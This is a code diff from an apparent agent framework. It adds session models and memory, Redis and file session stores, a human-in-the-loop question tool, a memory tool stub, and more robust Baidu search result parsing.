Raises:
ValueError: If the session does not exist or is closed.
"""
session = await self._store.get_session(session_id)
if session is None:
raise ValueError(f"Session '{session_id}' not found")
if session.status == SessionStatus.CLOSED:
raise ValueError(f"Session '{session_id}' is closed and cannot accept new messages")
message = Message(
message_id=Session.new_message_id(),
session_id=session_id,
role=role,
content=content,
tool_call_id=tool_call_id,
agent_name=agent_name,
metadata=metadata or {},
)
await self._store.append_message(message)
# Update session's updated_at timestamp
session.updated_at = __import__("datetime").datetime.now(__import__("datetime").timezone.utc)
await self._store.save_session(session)
return message
async def get_messages(
self,
session_id: str,
limit: int | None = None,
offset: int = 0,
) -> list[Message]:
"""Get messages for a session with optional pagination.
Args:
session_id: Target session ID.
limit: Maximum number of messages to return. None for all.
offset: Number of messages to skip from the beginning.
Returns:
List of messages ordered chronologically.
"""
return await self._store.get_messages(session_id, limit=limit, offset=offset)
async def get_chat_messages(self, session_id: str) -> list[dict[str, str]]:
"""Get messages formatted for LLM chat API consumption.
Returns messages as OpenAI-compatible dicts suitable for
passing directly to the ReAct engine or LLM Gateway.
"""
messages = await self._store.get_messages(session_id)
return [m.to_chat_message() for m in messages]
async def count_messages(self, session_id: str) -> int:
"""Count messages in a session."""
return await self._store.count_messages(session_id)
async def health_check(self) -> bool:
"""Check if the underlying store is healthy."""
return await self._store.health_check()

View File

@ -0,0 +1,125 @@
"""Session and Message data models for multi-turn conversations."""
from __future__ import annotations
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timezone
from enum import Enum
from typing import Any
class SessionStatus(str, Enum):
    """Lifecycle state of a conversation session.

    Members are also ``str`` instances, so they compare equal to their
    plain-string values and serialise directly via ``.value``.
    """

    # Session is open.
    ACTIVE = "active"
    # Session is temporarily suspended.
    PAUSED = "paused"
    # Session has ended.
    CLOSED = "closed"
class MessageRole(str, Enum):
    """Author role of a message, using the OpenAI chat role names.

    Members are also ``str`` instances, so ``.value`` can be placed directly
    into a chat-API ``role`` field.
    """

    SYSTEM = "system"
    USER = "user"
    ASSISTANT = "assistant"
    TOOL = "tool"
@dataclass
class Message:
    """One message belonging to a conversation session.

    Instances round-trip through ``to_dict``/``from_dict`` for persistence
    and convert to chat-API dicts via ``to_chat_message``.
    """

    message_id: str
    session_id: str
    role: MessageRole
    content: str
    tool_call_id: str | None = None
    agent_name: str | None = None
    # Timezone-aware UTC timestamp taken when the instance is created.
    created_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
    metadata: dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> dict[str, Any]:
        """Serialise to a JSON-friendly dict (role as string, time as ISO-8601)."""
        payload: dict[str, Any] = {}
        payload["message_id"] = self.message_id
        payload["session_id"] = self.session_id
        payload["role"] = self.role.value
        payload["content"] = self.content
        payload["tool_call_id"] = self.tool_call_id
        payload["agent_name"] = self.agent_name
        payload["created_at"] = self.created_at.isoformat()
        payload["metadata"] = self.metadata
        return payload

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> Message:
        """Rebuild a Message from the dict produced by ``to_dict``.

        ``message_id``, ``session_id``, ``role`` and ``content`` are required
        keys; a missing or empty ``created_at`` falls back to the current UTC
        time and a missing ``metadata`` to an empty dict.
        """
        kwargs: dict[str, Any] = {
            "message_id": data["message_id"],
            "session_id": data["session_id"],
            "role": MessageRole(data["role"]),
            "content": data["content"],
            "tool_call_id": data.get("tool_call_id"),
            "agent_name": data.get("agent_name"),
        }
        if data.get("created_at"):
            kwargs["created_at"] = datetime.fromisoformat(data["created_at"])
        else:
            kwargs["created_at"] = datetime.now(timezone.utc)
        kwargs["metadata"] = data.get("metadata", {})
        return cls(**kwargs)

    def to_chat_message(self) -> dict[str, str]:
        """Convert to a chat-API message dict.

        The result always has ``role`` and ``content``; ``tool_call_id`` is
        included only when it is set on the message.
        """
        chat: dict[str, str] = {"role": self.role.value, "content": self.content}
        if self.tool_call_id is None:
            return chat
        chat["tool_call_id"] = self.tool_call_id
        return chat
@dataclass
class Session:
    """A conversation session bound to one Agent.

    Holds lifecycle state and timestamps only; the messages themselves are
    kept by the session store backends.
    """

    session_id: str
    agent_name: str
    status: SessionStatus = SessionStatus.ACTIVE
    metadata: dict[str, Any] = field(default_factory=dict)
    # Both timestamps are timezone-aware UTC values taken at construction.
    created_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
    updated_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))

    def to_dict(self) -> dict[str, Any]:
        """Serialise to a JSON-friendly dict (status as string, times as ISO-8601)."""
        payload: dict[str, Any] = {}
        payload["session_id"] = self.session_id
        payload["agent_name"] = self.agent_name
        payload["status"] = self.status.value
        payload["metadata"] = self.metadata
        payload["created_at"] = self.created_at.isoformat()
        payload["updated_at"] = self.updated_at.isoformat()
        return payload

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> Session:
        """Rebuild a Session from the dict produced by ``to_dict``.

        ``session_id`` and ``agent_name`` are required keys. A missing status
        defaults to ``"active"``, missing metadata to an empty dict, and a
        missing or empty timestamp to the current UTC time.
        """
        kwargs: dict[str, Any] = {
            "session_id": data["session_id"],
            "agent_name": data["agent_name"],
            "status": SessionStatus(data.get("status", "active")),
            "metadata": data.get("metadata", {}),
        }
        for stamp_key in ("created_at", "updated_at"):
            if data.get(stamp_key):
                kwargs[stamp_key] = datetime.fromisoformat(data[stamp_key])
            else:
                kwargs[stamp_key] = datetime.now(timezone.utc)
        return cls(**kwargs)

    @staticmethod
    def new_session_id() -> str:
        """Return a fresh random UUID4 string for use as a session ID."""
        fresh = uuid.uuid4()
        return str(fresh)

    @staticmethod
    def new_message_id() -> str:
        """Return a fresh random UUID4 string for use as a message ID."""
        fresh = uuid.uuid4()
        return str(fresh)

View File

@ -0,0 +1,351 @@
"""Session store backends — InMemory and Redis."""
from __future__ import annotations
import json
import logging
import os
from typing import Any, Protocol, runtime_checkable
from agentkit.session.models import Message, Session, SessionStatus
logger = logging.getLogger(__name__)
@runtime_checkable
class SessionStore(Protocol):
    """Structural interface every session persistence backend implements.

    Marked ``runtime_checkable`` so ``isinstance(obj, SessionStore)`` verifies
    that all of the methods below are present.
    """

    async def save_session(self, session: Session) -> None:
        """Persist (create or overwrite) a session record."""

    async def get_session(self, session_id: str) -> Session | None:
        """Return the stored session, or None when the ID is unknown."""

    async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
        """Set a session's status; return the updated session or None if unknown."""

    async def delete_session(self, session_id: str) -> bool:
        """Remove a session and its messages; report whether anything was removed."""

    async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
        """Return up to ``limit`` sessions, optionally filtered by agent name."""

    async def append_message(self, message: Message) -> None:
        """Append a message to the session named by ``message.session_id``."""

    async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
        """Return a session's messages, skipping ``offset`` and capping at ``limit``."""

    async def count_messages(self, session_id: str) -> int:
        """Return how many messages are stored for the session."""

    async def health_check(self) -> bool:
        """Report whether the backend is usable."""
class InMemorySessionStore:
    """Dictionary-backed session store for development and testing.

    Sessions and their message lists are held in two dicts keyed by session
    ID, so nothing survives the process. Both the number of sessions and the
    number of messages per session are capped.
    """

    def __init__(self, max_sessions: int = 10000, max_messages_per_session: int = 50000):
        self._max_sessions = max_sessions
        self._max_messages_per_session = max_messages_per_session
        self._sessions: dict[str, Session] = {}
        self._messages: dict[str, list[Message]] = {}

    async def save_session(self, session: Session) -> None:
        """Store a session, evicting the stalest closed one when at capacity.

        Raises:
            RuntimeError: If the store is full, the session is new, and no
                closed session exists to evict.
        """
        sid = session.session_id
        at_capacity = len(self._sessions) >= self._max_sessions
        if at_capacity and sid not in self._sessions:
            # Only closed sessions are eligible for eviction.
            victim = min(
                (s for s in self._sessions.values() if s.status == SessionStatus.CLOSED),
                key=lambda s: s.updated_at,
                default=None,
            )
            if victim is None:
                raise RuntimeError("SessionStore is full and no closed sessions to evict")
            del self._sessions[victim.session_id]
            self._messages.pop(victim.session_id, None)
        self._sessions[sid] = session
        # Keep an (initially empty) message list for every known session.
        self._messages.setdefault(sid, [])

    async def get_session(self, session_id: str) -> Session | None:
        """Return the stored session object, or None if the ID is unknown."""
        return self._sessions.get(session_id)

    async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
        """Set status and refresh ``updated_at`` in place; None if unknown."""
        target = self._sessions.get(session_id)
        if target is not None:
            target.status = status
            target.updated_at = datetime.now(timezone.utc)
        return target

    async def delete_session(self, session_id: str) -> bool:
        """Drop a session and its messages; False when the ID is unknown."""
        try:
            del self._sessions[session_id]
        except KeyError:
            return False
        self._messages.pop(session_id, None)
        return True

    async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
        """Return up to ``limit`` sessions, most recently updated first.

        A falsy ``agent_name`` (None or empty string) disables the filter.
        """
        candidates = [
            s for s in self._sessions.values()
            if not agent_name or s.agent_name == agent_name
        ]
        newest_first = sorted(candidates, key=lambda s: s.updated_at, reverse=True)
        return newest_first[:limit]

    async def append_message(self, message: Message) -> None:
        """Append a message, discarding the oldest ones once the cap is hit."""
        history = self._messages.setdefault(message.session_id, [])
        # Number of entries to drop so that the list fits the cap after the append.
        overflow = len(history) + 1 - self._max_messages_per_session
        if overflow > 0:
            del history[:overflow]
        history.append(message)

    async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
        """Return a new list with the session's messages after ``offset``, capped at ``limit``."""
        window = self._messages.get(session_id, [])[offset:]
        return window if limit is None else window[:limit]

    async def count_messages(self, session_id: str) -> int:
        """Return the number of stored messages (0 for an unknown session)."""
        history = self._messages.get(session_id, [])
        return len(history)

    async def health_check(self) -> bool:
        """Always healthy: there is no external dependency."""
        return True
class RedisSessionStore:
    """Redis-backed session store for production use.

    Key patterns:
        - ``agentkit:session:{session_id}``: session metadata as a JSON
          string, written with a TTL.
        - ``agentkit:session:{session_id}:messages``: Redis list of JSON
          encoded messages, whose TTL is refreshed on every append.
    """

    KEY_PREFIX = "agentkit:session:"
    MSG_SUFFIX = ":messages"

    def __init__(self, redis_url: str = "redis://localhost:6379/0", ttl_seconds: int = 86400):
        self._redis_url = redis_url
        self._ttl_seconds = ttl_seconds
        # Client is created lazily on first use; constructing the store does no I/O.
        self._redis: Any = None

    async def _get_redis(self):
        """Return the shared async Redis client, creating it on first call."""
        if self._redis is None:
            import redis.asyncio as aioredis

            self._redis = aioredis.from_url(self._redis_url, decode_responses=True)
        return self._redis

    def _session_key(self, session_id: str) -> str:
        """Key holding the session's JSON metadata."""
        return f"{self.KEY_PREFIX}{session_id}"

    def _messages_key(self, session_id: str) -> str:
        """Key holding the session's message list."""
        return f"{self.KEY_PREFIX}{session_id}{self.MSG_SUFFIX}"

    async def save_session(self, session: Session) -> None:
        """Write the session metadata and (re)start its TTL."""
        redis = await self._get_redis()
        key = self._session_key(session.session_id)
        await redis.set(key, json.dumps(session.to_dict()), ex=self._ttl_seconds)

    async def get_session(self, session_id: str) -> Session | None:
        """Load a session, or None when the key is absent (unknown or expired)."""
        redis = await self._get_redis()
        raw = await redis.get(self._session_key(session_id))
        if raw is None:
            return None
        return Session.from_dict(json.loads(raw))

    async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
        """Rewrite the session with a new status and timestamp; None if absent.

        This is a read-modify-write of the JSON value, not an atomic update.
        """
        redis = await self._get_redis()
        key = self._session_key(session_id)
        raw = await redis.get(key)
        if raw is None:
            return None
        session = Session.from_dict(json.loads(raw))
        session.status = status
        session.updated_at = datetime.now(timezone.utc)
        await redis.set(key, json.dumps(session.to_dict()), ex=self._ttl_seconds)
        return session

    async def delete_session(self, session_id: str) -> bool:
        """Delete both the metadata and message keys; True if either existed."""
        redis = await self._get_redis()
        keys = [self._session_key(session_id), self._messages_key(session_id)]
        deleted = await redis.delete(*keys)
        return deleted > 0

    async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
        """Scan all session keys and return up to ``limit``, newest first.

        Every matching session is loaded before sorting, so the cost grows
        with the total number of stored sessions, not with ``limit``.
        """
        redis = await self._get_redis()
        sessions: list[Session] = []
        cursor = 0
        while True:
            cursor, keys = await redis.scan(cursor, match=f"{self.KEY_PREFIX}*", count=200)
            # The prefix also matches the ":messages" list keys; skip those.
            session_keys = [k for k in keys if not k.endswith(self.MSG_SUFFIX)]
            if session_keys:
                values = await redis.mget(session_keys)
                for raw in values:
                    # A key can expire between SCAN and MGET.
                    if raw is None:
                        continue
                    session = Session.from_dict(json.loads(raw))
                    if agent_name is None or session.agent_name == agent_name:
                        sessions.append(session)
            # SCAN signals completion by returning cursor 0.
            if cursor == 0:
                break
        sessions.sort(key=lambda s: s.updated_at, reverse=True)
        return sessions[:limit]

    async def append_message(self, message: Message) -> None:
        """Push a message onto the session's list and refresh the list TTL."""
        redis = await self._get_redis()
        key = self._messages_key(message.session_id)
        await redis.rpush(key, json.dumps(message.to_dict()))
        # Keep the message list alive for another TTL window.
        await redis.expire(key, self._ttl_seconds)

    async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
        """Return messages ``offset .. offset+limit-1`` from the Redis list.

        ``limit=None`` returns everything from ``offset`` onward and
        ``limit=0`` returns an empty list.
        """
        # LRANGE's end index is inclusive and -1 means "last element".
        # Without this guard limit=0 at offset=0 would yield end == -1 and
        # return the whole list instead of nothing.
        if limit == 0:
            return []
        redis = await self._get_redis()
        key = self._messages_key(session_id)
        end = offset + limit - 1 if limit is not None else -1
        raw_list = await redis.lrange(key, offset, end)
        return [Message.from_dict(json.loads(raw)) for raw in raw_list]

    async def count_messages(self, session_id: str) -> int:
        """Return the length of the session's message list."""
        redis = await self._get_redis()
        return await redis.llen(self._messages_key(session_id))

    async def health_check(self) -> bool:
        """Ping Redis; any failure (including a missing client library) is False."""
        try:
            redis = await self._get_redis()
            return await redis.ping()
        except Exception:
            return False
# datetime/timezone are used for the updated_at timestamps written by the store classes in this module.
from datetime import datetime, timezone # noqa: E402
class FileSessionStore:
    """File-based session store: one JSON file per session.

    Each file is ``<data_dir>/<session_id>.json`` and contains
    ``{"session": {...}, "messages": [...]}``. The default directory is
    ``~/.agentkit/sessions``. Intended for single-user GUI mode without Redis.
    """

    def __init__(self, data_dir: str | None = None):
        if data_dir is None:
            data_dir = os.path.expanduser("~/.agentkit/sessions")
        self._data_dir = data_dir
        os.makedirs(self._data_dir, exist_ok=True)

    def _session_path(self, session_id: str) -> str:
        """Return the JSON file path for a session.

        NOTE(review): ``session_id`` is used verbatim as the file name, so
        callers must not pass IDs containing path separators — confirm that
        IDs reaching this store are always server-generated.
        """
        return os.path.join(self._data_dir, f"{session_id}.json")

    def _read_session_file(self, session_id: str) -> dict | None:
        """Load a session file, or return None when it does not exist."""
        try:
            with open(self._session_path(session_id), encoding="utf-8") as f:
                return json.load(f)
        except FileNotFoundError:
            return None

    def _write_session_file(self, session_id: str, data: dict) -> None:
        """Write a session file atomically.

        The data goes to a sibling ``.tmp`` file first and is then moved into
        place, so a crash mid-write cannot leave a truncated session file.
        """
        path = self._session_path(session_id)
        tmp_path = f"{path}.tmp"
        with open(tmp_path, "w", encoding="utf-8") as f:
            json.dump(data, f, ensure_ascii=False, indent=2)
        os.replace(tmp_path, path)

    @staticmethod
    def _session_meta(data: Any) -> dict | None:
        """Return the file's session record if it can be turned into a Session.

        Files that hold only messages (or a partial stub without
        ``agent_name``) yield None instead of failing later in
        ``Session.from_dict``.
        """
        if not isinstance(data, dict):
            return None
        meta = data.get("session")
        if not isinstance(meta, dict):
            return None
        if "session_id" not in meta or "agent_name" not in meta:
            return None
        return meta

    async def save_session(self, session: Session) -> None:
        """Write the session record, preserving any messages already on disk.

        The stored ``updated_at`` is always set to the current UTC time.
        """
        data = self._read_session_file(session.session_id) or {"messages": []}
        data["session"] = session.to_dict()
        data["session"]["updated_at"] = datetime.now(timezone.utc).isoformat()
        self._write_session_file(session.session_id, data)

    async def get_session(self, session_id: str) -> Session | None:
        """Load a session; None if the file or its session record is missing."""
        meta = self._session_meta(self._read_session_file(session_id))
        if meta is None:
            return None
        return Session.from_dict(meta)

    async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
        """Persist a new status and timestamp; None if the session is unknown."""
        data = self._read_session_file(session_id)
        meta = self._session_meta(data)
        if meta is None:
            return None
        meta["status"] = status.value
        meta["updated_at"] = datetime.now(timezone.utc).isoformat()
        self._write_session_file(session_id, data)
        return Session.from_dict(meta)

    async def delete_session(self, session_id: str) -> bool:
        """Remove the session file; False when there was none."""
        try:
            os.remove(self._session_path(session_id))
        except FileNotFoundError:
            return False
        return True

    async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
        """Return up to ``limit`` sessions from disk, most recently updated first.

        Files that cannot be read or parsed are skipped with a warning so one
        bad file does not hide every other session.
        """
        sessions: list[Session] = []
        for fname in os.listdir(self._data_dir):
            if not fname.endswith(".json"):
                continue
            path = os.path.join(self._data_dir, fname)
            try:
                with open(path, encoding="utf-8") as f:
                    data = json.load(f)
                meta = self._session_meta(data)
                if meta is None:
                    # Message-only file: there is no session to list.
                    continue
                session = Session.from_dict(meta)
            except Exception:
                logger.warning("Skipping unreadable session file %s", path, exc_info=True)
                continue
            if agent_name is None or session.agent_name == agent_name:
                sessions.append(session)
        sessions.sort(key=lambda s: s.updated_at, reverse=True)
        return sessions[:limit]

    async def append_message(self, message: Message) -> None:
        """Append a message to the session file.

        If no file exists yet, a message-only file is created; no session
        record is fabricated, so ``get_session`` keeps returning None until
        ``save_session`` is called.
        """
        data = self._read_session_file(message.session_id)
        if data is None:
            data = {"messages": []}
        data.setdefault("messages", []).append(message.to_dict())
        # Bump the session timestamp when a session record is present.
        if isinstance(data.get("session"), dict):
            data["session"]["updated_at"] = datetime.now(timezone.utc).isoformat()
        self._write_session_file(message.session_id, data)

    async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
        """Return the stored messages after ``offset``, capped at ``limit``."""
        data = self._read_session_file(session_id)
        if data is None:
            return []
        msgs = data.get("messages", [])[offset:]
        if limit is not None:
            msgs = msgs[:limit]
        return [Message.from_dict(m) for m in msgs]

    async def count_messages(self, session_id: str) -> int:
        """Return the number of stored messages (0 when the file is missing)."""
        data = self._read_session_file(session_id)
        if data is None:
            return 0
        return len(data.get("messages", []))

    async def health_check(self) -> bool:
        """Healthy when the data directory exists."""
        return os.path.isdir(self._data_dir)
def create_session_store(
    backend: str = "memory",
    redis_url: str = "redis://localhost:6379/0",
    ttl_seconds: int = 86400,
    data_dir: str | None = None,
) -> InMemorySessionStore | RedisSessionStore | FileSessionStore:
    """Factory: create a session store backed by memory, file, or Redis.

    Backends:
        - ``memory``: in-memory (lost on restart)
        - ``file``: JSON files, by default in ``~/.agentkit/sessions/``
        - ``redis``: Redis-backed (requires the ``redis`` package)

    Args:
        backend: One of ``"memory"``, ``"file"`` or ``"redis"``.
        redis_url: Connection URL, used only by the Redis backend.
        ttl_seconds: Key TTL, used only by the Redis backend.
        data_dir: Storage directory, used only by the file backend.

    Returns:
        The requested store. Falls back to ``InMemorySessionStore`` (with a
        warning) when the Redis backend cannot be initialised or the backend
        name is not recognised. Only the ``redis`` import is probed here; no
        connection is attempted, so an unreachable server is not detected.
    """
    if backend == "file":
        store = FileSessionStore(data_dir=data_dir)
        logger.info("SessionStore backend: file (%s)", store._data_dir)
        return store

    if backend == "redis":
        try:
            import redis.asyncio as aioredis  # noqa: F401

            store = RedisSessionStore(redis_url=redis_url, ttl_seconds=ttl_seconds)
        except Exception as exc:
            logger.warning(
                "Failed to initialise RedisSessionStore (%s), falling back to InMemorySessionStore",
                exc,
            )
        else:
            logger.info("SessionStore backend: redis")
            return store
    elif backend != "memory":
        # A misspelled backend previously degraded to memory without any trace.
        logger.warning(
            "Unknown SessionStore backend %r, falling back to InMemorySessionStore",
            backend,
        )

    store = InMemorySessionStore()
    logger.info("SessionStore backend: memory")
    return store

View File

@ -13,6 +13,9 @@ from agentkit.tools.shell import ShellTool
from agentkit.tools.terminal_session import TerminalSession, TerminalSessionManager from agentkit.tools.terminal_session import TerminalSession, TerminalSessionManager
from agentkit.tools.pty_session import PTYSession from agentkit.tools.pty_session import PTYSession
from agentkit.tools.output_parser import OutputParser, ParsedOutput, ErrorType from agentkit.tools.output_parser import OutputParser, ParsedOutput, ErrorType
from agentkit.tools.ask_human import AskHumanTool
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.web_search import WebSearchTool
# Conditional import: HeadroomRetrieveTool requires HeadroomCompressor # Conditional import: HeadroomRetrieveTool requires HeadroomCompressor
try: try:
@ -33,8 +36,11 @@ __all__ = [
"SchemaExtractTool", "SchemaExtractTool",
"SchemaGenerateTool", "SchemaGenerateTool",
"BaiduSearchTool", "BaiduSearchTool",
"HeadroomRetrieveTool", "AskHumanTool",
"MemoryTool",
"ShellTool", "ShellTool",
"WebSearchTool",
"HeadroomRetrieveTool",
"TerminalSession", "TerminalSession",
"TerminalSessionManager", "TerminalSessionManager",
"PTYSession", "PTYSession",

View File

@ -0,0 +1,119 @@
"""AskHumanTool — Human-in-the-Loop tool for Chat mode.
When registered in a Chat-mode Agent, this tool allows the ReAct loop
to pause and ask the user a question, then wait for a reply via the
WebSocket connection.
"""
from __future__ import annotations
import asyncio
import logging
import uuid
from typing import Any
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
class AskHumanTool(Tool):
    """Tool that asks the human user a question and waits for a reply.

    The tool needs two things injected through :meth:`configure`: a dict of
    pending reply futures and an async callback that delivers the question
    to the client. Until both are set it answers with a default instead of
    blocking.

    Usage in the ReAct loop:
        The Agent calls this tool when it needs clarification or a decision
        from the user. The question is handed to the callback, and the tool
        waits until the registered future is resolved or the timeout expires.
    """

    def __init__(self, timeout: float = 60.0):
        super().__init__(
            name="ask_human",
            description="Ask the human user a question and wait for their reply. "
                        "Use this when you need clarification, a decision, or "
                        "confirmation from the user before proceeding.",
        )
        # Seconds to wait for the user's reply.
        self._timeout = timeout
        # Shared dict (request_id -> asyncio.Future) injected via configure().
        self._pending_replies: dict[str, asyncio.Future] | None = None
        # Async callable that pushes the question to the client.
        self._ask_callback: Any = None

    def configure(
        self,
        pending_replies: dict[str, asyncio.Future] | None = None,
        ask_callback: Any = None,
    ) -> None:
        """Attach the communication channels used to reach the user.

        Args:
            pending_replies: Dict mapping request_id to the Future that will
                be resolved when the user replies.
            ask_callback: Async callable ``(request_id, question, options)``
                that pushes the question to the client.
        """
        self._pending_replies = pending_replies
        self._ask_callback = ask_callback

    @property
    def parameters(self) -> dict[str, Any]:
        """JSON schema of the arguments accepted by :meth:`execute`."""
        return {
            "type": "object",
            "properties": {
                "question": {
                    "type": "string",
                    "description": "The question to ask the user",
                },
                "options": {
                    "type": "array",
                    "items": {"type": "string"},
                    "description": "Optional list of choices for the user",
                },
            },
            "required": ["question"],
        }

    async def execute(self, **kwargs: Any) -> dict:
        """Ask the user a question and wait for their reply.

        Args:
            question: The question to ask.
            options: Optional list of choices.

        Returns:
            Dict with a ``"reply"`` key. It holds the user's answer as a
            string, or a default (the first option if any) when the tool is
            not configured or the wait times out.
        """
        question = kwargs.get("question", "")
        options = kwargs.get("options")

        pending = self._pending_replies
        if pending is None or self._ask_callback is None:
            # Not configured: answer with a default instead of blocking.
            logger.warning("AskHumanTool called outside Chat mode, returning default response")
            default = options[0] if options else "confirmed"
            return {"reply": default}

        request_id = str(uuid.uuid4())[:8]

        # Register the future BEFORE invoking the callback so the callback
        # (or any concurrent task) can resolve it immediately.
        # get_running_loop() is the supported way to reach the loop from
        # inside a coroutine.
        future = asyncio.get_running_loop().create_future()
        pending[request_id] = future

        try:
            # Inside the try so a failing callback cannot leave a stale
            # future behind in the shared dict.
            await self._ask_callback(request_id, question, options)
            try:
                reply = await asyncio.wait_for(future, timeout=self._timeout)
            except asyncio.TimeoutError:
                logger.warning(f"AskHumanTool timeout for request {request_id}")
                default = options[0] if options else "timeout — no response received"
                return {"reply": default}
            return {"reply": str(reply)}
        finally:
            pending.pop(request_id, None)

View File

@ -158,15 +158,39 @@ class BaiduSearchTool(Tool):
"User-Agent": ( "User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) " "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) " "AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36" "Chrome/131.0.0.0 Safari/537.36"
), ),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Upgrade-Insecure-Requests": "1",
}, },
) )
html = resp.text html = resp.text
# Check if we got a captcha page
if "验证" in html and len(html) < 5000:
logger.warning("Baidu returned captcha page, search unavailable")
return {
"error": "Baidu search blocked by captcha",
"results": [],
"total": 0,
"success": False,
}
# 简单解析搜索结果(基于百度搜索结果页 HTML 结构) # 简单解析搜索结果(基于百度搜索结果页 HTML 结构)
results = self._parse_baidu_html(html, max_results) results = self._parse_baidu_html(html, max_results)
if not results:
# Try alternative parsing
results = self._parse_baidu_html_alt(html, max_results)
return {"results": results, "total": len(results), "success": True} return {"results": results, "total": len(results), "success": True}
except Exception as e: except Exception as e:
@ -188,38 +212,111 @@ class BaiduSearchTool(Tool):
results: list[dict[str, str]] = [] results: list[dict[str, str]] = []
# 匹配百度搜索结果块 # 匹配百度搜索结果块 - multiple patterns for different Baidu page versions
# 百度搜索结果通常在 <div class="result c-container"> 中 # Pattern 1: <h3 class="t"> with href
pattern = re.compile( pattern1 = re.compile(
r'<h3[^>]*class="[^"]*t[^"]*"[^>]*>.*?href="([^"]*)"[^>]*>(.*?)</a>', r'<h3[^>]*class="[^"]*t[^"]*"[^>]*>.*?href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL, re.DOTALL,
) )
snippet_pattern = re.compile( # Pattern 2: <h3> with data-url or inside <div class="result">
pattern2 = re.compile(
r'<h3[^>]*>.*?<a[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
# Snippet patterns
snippet_pattern1 = re.compile(
r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>',
re.DOTALL,
)
snippet_pattern2 = re.compile(
r'<div[^>]*class="[^"]*c-abstract[^"]*"[^>]*>(.*?)</div>',
re.DOTALL,
)
snippet_pattern3 = re.compile(
r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>', r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>',
re.DOTALL, re.DOTALL,
) )
# Try pattern 1 first
for match in pattern1.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not title or len(title) < 2:
continue
# Skip Baidu internal links that aren't redirect links
if "baidu.com" in url and "baidu.com/link?" not in url:
continue
if not url.startswith("http") and "baidu.com/link?" not in url:
continue
snippet = ""
for sp in [snippet_pattern1, snippet_pattern2, snippet_pattern3]:
snippet_match = sp.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
if snippet:
break
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300] if snippet else "",
})
# If pattern 1 found nothing, try pattern 2
if not results:
for match in pattern2.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not title or len(title) < 2:
continue
if "baidu.com" in url and "baidu.com/link?" not in url:
continue
if not url.startswith("http") and "baidu.com/link?" not in url:
continue
snippet = ""
for sp in [snippet_pattern1, snippet_pattern2, snippet_pattern3]:
snippet_match = sp.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
if snippet:
break
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300] if snippet else "",
})
return results
@staticmethod
def _parse_baidu_html_alt(html: str, max_results: int) -> list[dict[str, str]]:
"""Alternative Baidu HTML parser - broader pattern matching."""
import re
results: list[dict[str, str]] = []
# Generic pattern: any <a> tag with baidu.com/link redirect
pattern = re.compile(
r'<a[^>]*href="(https?://www\.baidu\.com/link\?[^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
for match in pattern.finditer(html): for match in pattern.finditer(html):
if len(results) >= max_results: if len(results) >= max_results:
break break
url = match.group(1) url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip() title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if title and len(title) > 2:
# 跳过百度内部链接 results.append({
if "baidu.com/link?" not in url and not url.startswith("http"): "title": title[:200],
continue "url": url,
"snippet": "",
# 尝试提取摘要 })
snippet = ""
snippet_match = snippet_pattern.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
results.append({
"title": title,
"url": url,
"snippet": snippet[:200] if snippet else "",
})
return results return results

View File

@ -0,0 +1,117 @@
"""MemoryTool — Agent 可在对话中读写记忆的工具.
操作:
- add: 追加内容到指定 section
- replace: 替换 section 内的文本
- remove: 删除整个 section
- read: 读取文件内容
file 参数: soul | user | memory | daily
"""
from __future__ import annotations
from typing import Any
from agentkit.memory.profile import MemoryStore
from agentkit.tools.base import Tool
VALID_FILES = {"soul", "user", "memory", "daily"}
VALID_ACTIONS = {"add", "replace", "remove", "read"}
class MemoryTool(Tool):
